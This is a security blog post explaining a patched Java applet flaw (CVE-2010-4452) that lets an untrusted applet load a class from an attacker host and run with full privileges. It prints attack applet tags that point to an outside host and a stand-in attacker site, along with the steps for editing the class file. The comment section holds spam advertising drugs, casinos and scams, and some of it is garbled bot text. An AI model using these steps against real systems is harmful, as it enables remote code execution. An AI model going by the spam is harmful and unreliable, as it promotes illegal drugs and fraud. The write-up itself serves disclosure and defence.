Oracle Java Unsigned Applet Applet2ClassLoader Remote Code Execution Vulnerability (ZDI-11-084 explained)

Details can be found at ZDI and CVE, and Oracle :
ZDI-11-084
CVE-2010-4452
Oracle

This vulnerability allows an untrusted applet to gain all privileges. Untrusted applets launch without user interaction (other than visiting a web page containing the <applet> tag, of course).

The vulnerability

Prior to version 1.6.0_24, the JRE allowed to load a class from an URL without checking if it matched the protocol, host, and port of the document containing the applet. This means that things like that:

<applet codebase=”http://somesite.com/” code=”http://attackersite.com/AttackerCode” />

would try to load the class located at http://attackersite.com/AttackerCode.class as if it came from the URL http://somesite.com/. The content of the “code” attribute was assumed to be a class name, no check was made, but when passing it as an argument to the URL constructor, it would be parsed as an absolute URL, as the protocol is present.

However, that is not enough to actually make the JRE download and load the file http://attackersite.com/AttackerCode.class. This is because every dot is replaced by a slash before the URL is instantiated. In our case, http://attackersite.com/AttackerCode would become http://attackersite/com/AttackerCode, and the download would fail.

This is where an old trick makes everything possible: IP addresses have a lot of possible notations. Among them, one I call the numeric notation: take the 4 bytes of the IP address, concatenate them to obtain a 4 bytes word, and convert this word to a decimal number. Example: take 192.168.0.1, or C0.A8.00.01. Convert C0A80001 to a decimal number, you get 3232235521. This notation is valid almost everywhere, including the JRE.

So, if we consider the following tag:

<applet codebase=”http://somesite.com/” code=”http://3232235521/AttackerCode” />

This time, the JRE will download the class file located at http://192.168.0.1/AttackerCode.class and load it as of it came from http://somesite.com/.

Executing arbitrary code

Unsigned applets are sandboxed and shouldn’t be able to do any harm to a computer. However, the JRE has a set of trusted classes, which are granted all permissions.

All the classes located at the “lib\ext” folder of the JRE installation folder are trusted classes. By using this folder as the codebase of an applet, the applet will be considered trusted and be granted all privileges:

<applet codebase=”file:C:\Program Files\Java\jre6\lib\ext” code=”http://3232235522/AttackerCode” />

The AttackerCode.class file needs to be modified for the JVM to accept to load it: the “code” attribute of the applet tag is supposed to be the class name. If the class name doesn’t match it, the JVM will refuse to load the class. The easiest way to fix that is to make the applet name length match the length of the “code” attribute, and then to edit the class file with an hexadecimal editor. The name is very easy to spot, it’s near the beginning of the file. Once it’s changed to http://3232235522/AttackerCode, the JVM will load the class. The new name isn’t valid to the java compiler, but the JVM doesn’t care.

Also, no http server will accept an all numeric string as a valid host. Even though, this vulnerability remains easy to exploit, and is very reliable.

How Oracle fixed it

Oracle fixed it in Java 1.6.0_24 by checking early in the process of loading an applet if the code attribute has the same protocol, host, and port as the codebase attribute. And, just in case, they added the same check to Applet2ClassLoader, even though the URL mismatch will be detected earlier.

Upgrade to Java 1.6.0_24.

Java 1.6.0_24 fixes a lot of other security vulnerabilities. Sami Koivu details ZDI-11-083 on his blog.

This entry was posted in Software vulnerability. Bookmark the permalink.

37 Responses to Oracle Java Unsigned Applet Applet2ClassLoader Remote Code Execution Vulnerability (ZDI-11-084 explained)

  1. Luis says:

    Hi Frédéric,
    I’m trying to create the exploit here in the lab but I came across some problems.
    1) He looks for the class (eg http://localhost/Java). However, I managed by changing the bytecode directly, leave the package with http://localhost and class load.
    2) The problem I’m in now, it looks for a file (eg C: \ Program Files \ Java \ jre6 \ lib \ ext \ http \ localhost \ java) before loading the applet. Any suggestions?
    POC?

    Sorry for my poor English.

    Regards,
    Luis

  2. fhoguin says:

    Luis,

    I updated the article with more details about editing the class name for it to match the content of the code attribute.

    Also, an exploit has been added to the metasploit framework: http://www.metasploit.com/redmine/projects/framework/repository/revisions/11982

  3. Kadir BASOL says:

    Its very bad most exploits moving to metasploit.
    So that most lamers use professional made exploits and Antivirus companies begin to catch them up.This makes their value down to 0.

  4. Pingback: Pwnie for Best Server-Side Bug « [ Broadcast Labs ] 100% Inteligência Cibernética

  5. Pingback: Pwnie for Best Server-Side Bug « Cyber investigation Notice | Global Information Assurance

  6. Pingback: CVE-2010-4452 : Oracle Java Applet2ClassLoader RCE Metasploit Demo

  7. Waltraud says:

    Test a new platform of binary options with the tools of technical analysis a set of ready-made strategies. The unique option of «risk-free trade». $ 153 620 Paid to our traders yesterday. Register now and get 10.000 virtual FUNDS in case of right forecast! This is FREE! подробнее вот iwk1z.tk

  8. Sheree says:

    An outstanding share! I’ve just forwarded this onto a coworker who had been conducting a little research on this.
    And he actually ordered me lunch because I discovered it for him…
    lol. So let me reword this…. Thanks for the meal!! But yeah, thanks for spending time to discuss this subject here on your web site.

  9. Michaelbat says:

    Привет!
    Такой такой прикольный сайт.

    Масса приколов…План, Амф, Мяу-Мяу, Амф, и т.д.
    Переходи на сайт:
    [b]
    http://hydra.locanecuciqu.tk

    [/b]

  10. WilliamMep says:

    Всем Привет!
    Очень такой прикольный сайт.

    Много приколов…Миксы, Меф, Альфа, PVP, и т.д.
    Заходи на сайт:
    [b]
    https://frankcasinos-play.com/
    Трансвиститы

    франк казино официальный

    Педофилы

    [/b]

  11. Artisantlb says:

    inventions of typography

  12. Personally We have also just dedicated to a different UK learning start-up, Night Zookeeper and even while we certainly have some path to take
    with having the enterprise system and version completed, I think we must
    use it on the US as most UK.

  13. Broncovwt says:

    for Countess Louise of Savoy

  14. Squierqsb says:

    the best poets of his era and

  15. CHIRPdob says:

    manuscripts underwent in the Middle

  16. Vortexinx says:

    “Julia’s Garland” (fr. Guirlande de Julie)

  17. Epiphonewng says:

    XVII century was Nicholas Jarry [fr].

  18. Businesspri says:

    from lat. manus – “hand” and scribo – “I write”) [1]

  19. Weaponupx says:

    book about the chess of love “, created by

  20. Dysonfsu says:

    European glory, and even after

  21. Dormanlum says:

    Europe, and in Ancient Russia

  22. Vintagedht says:

    Europe, and in Ancient Russia

  23. Backlitgvk says:

    book about the chess of love “, created by

  24. Artisanstp says:

    XVII century was Nicholas Jarry [fr].

  25. Keypadaqta says:

    new texts were rewritten

  26. Kelly Clarkson said it best…my briansclub ife would suck without you!

  27. Speakeraqp says:

    from lat. manus – “hand” and scribo – “I write”) [1]

Leave a Reply

Your email address will not be published. Required fields are marked *